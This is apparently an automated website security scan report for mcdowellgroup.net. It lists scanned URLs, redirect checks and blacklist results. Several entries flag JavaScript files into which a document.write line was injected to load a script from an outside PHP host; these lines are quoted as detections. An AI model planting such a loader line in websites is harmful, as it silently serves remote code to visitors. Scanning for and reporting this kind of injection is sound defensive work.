Scanned pages/files
| Request | Server response | Status |
http://mcdowellgroup.net/ | 200 OK Content-Length: 10040 Content-Type: text/html | clean |
http://mcdowellgroup.net/js/sifr.js | 200 OK Content-Length: 31674 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.kirjastoavain.fi/2site/vCjhKzm2.php?id=15942875"></script>'); | ||
http://mcdowellgroup.net/js/scripts.js | 200 OK Content-Length: 4509 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.kirjastoavain.fi/2site/vCjhKzm2.php?id=15942873"></script>'); | ||
http://mcdowellgroup.net/about/staff.htm | 200 OK Content-Length: 23667 Content-Type: text/html | clean |
http://mcdowellgroup.net/about/../js/sifr.js | 200 OK Content-Length: 31674 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.kirjastoavain.fi/2site/vCjhKzm2.php?id=15942875"></script>'); | ||
http://mcdowellgroup.net/about/../js/scripts.js | 200 OK Content-Length: 4509 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.kirjastoavain.fi/2site/vCjhKzm2.php?id=15942873"></script>'); | ||
http://mcdowellgroup.net/about/../contact | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 05 May 2014 05:59:07 GMT Location: http://mcdowellgroup.net/contact/ Server: Apache Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 | clean |
http://mcdowellgroup.net/contact/ | 200 OK Content-Length: 7409 Content-Type: text/html | clean |
http://mcdowellgroup.net/contact/../js/sifr.js | 200 OK Content-Length: 31674 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.kirjastoavain.fi/2site/vCjhKzm2.php?id=15942875"></script>'); | ||
http://mcdowellgroup.net/about/../../js/scripts.js | 400 Bad Request Content-Length: 412 Content-Type: text/html | clean |
http://mcdowellgroup.net/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://mcdowellgroup.net/about/../ | 200 OK Content-Length: 10040 Content-Type: text/html | clean |
http://mcdowellgroup.net/about/../about/staff.htm | 200 OK Content-Length: 23667 Content-Type: text/html | clean |
http://mcdowellgroup.net/about/../about/../js/sifr.js | 200 OK Content-Length: 31674 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.kirjastoavain.fi/2site/vCjhKzm2.php?id=15942875"></script>'); | ||
http://mcdowellgroup.net/about/../about/../js/scripts.js | 200 OK Content-Length: 4509 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.kirjastoavain.fi/2site/vCjhKzm2.php?id=15942873"></script>'); | ||
http://mcdowellgroup.net/about/../about/../contact | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 05 May 2014 05:59:12 GMT Location: http://mcdowellgroup.net/contact/ Server: Apache Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 | clean |
http://mcdowellgroup.net/about/../about/../ | 200 OK Content-Length: 10040 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mcdowellgroup.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 May 2014 05:59:03 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 10040
Content-Type: text/html
Last-Modified: Wed, 26 Mar 2014 00:31:54 GMT
...10040 bytes of data.
GET / HTTP/1.1
Host: mcdowellgroup.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 May 2014 05:59:03 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 10040
Content-Type: text/html
Last-Modified: Wed, 26 Mar 2014 00:31:54 GMT
...10040 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mcdowellgroup.net
Referer: http://www.google.com/search?q=mcdowellgroup.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mcdowellgroup.net
Referer: http://www.google.com/search?q=mcdowellgroup.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mcdowellgroup.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mcdowellgroup.net/
Result: mcdowellgroup.net is not infected or malware details are not published yet.
Result: mcdowellgroup.net is not infected or malware details are not published yet.
